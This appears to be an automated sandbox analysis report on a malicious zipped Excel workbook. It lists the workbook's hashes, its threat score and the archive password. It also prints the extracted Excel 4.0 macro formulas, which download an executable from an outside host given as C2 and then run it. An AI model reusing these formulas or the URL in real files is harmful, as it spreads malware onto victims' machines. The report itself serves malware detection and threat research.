General

  • Target

    9cf979d335b81e468e3633440256030be7723c5d5fb1bbcc7d016ea6ec539276.zip

  • Size

    45KB

  • MD5

    f0e511946dbf25ba70ef77636ddaaec8

  • SHA1

    f890230a292fca9d27f88c3725f41320ff4810ad

  • SHA256

    9cf979d335b81e468e3633440256030be7723c5d5fb1bbcc7d016ea6ec539276

  • SHA512

    79b33a4198b6f4615cf454cc294fe27425cf9a9595a962df90e166489c3cea37f80c8eaff91c0e83005acba32716253358db42ca83055f6a5ddd6394995617db

  • SSDEEP

    768:Tx2U43NtxXkjkUXPKX/bNYvv8dtaYfbN0CWTqS+SaTS3FDY8ic:TUjJrU/WKeE26eS+v23KI

Score
10/10

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

    http://invoice7mukszq9nbpa7online.ru/unfeminized.exe

Attributes
  • formulas

    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://invoice7mukszq9nbpa7online.ru/unfeminized.exe","C:\ProgramData\plaukbp.exe",0,0)
    =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\plaukbp.exe",,0,0)
    =HALT()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • 9cf979d335b81e468e3633440256030be7723c5d5fb1bbcc7d016ea6ec539276.zip
    .zip

    Password: infected

  • 42b382be2e0f600fcec16ead4440475ffa839ed56724ef960b24f2affda4afb9.xlsm
    .xlsm office2007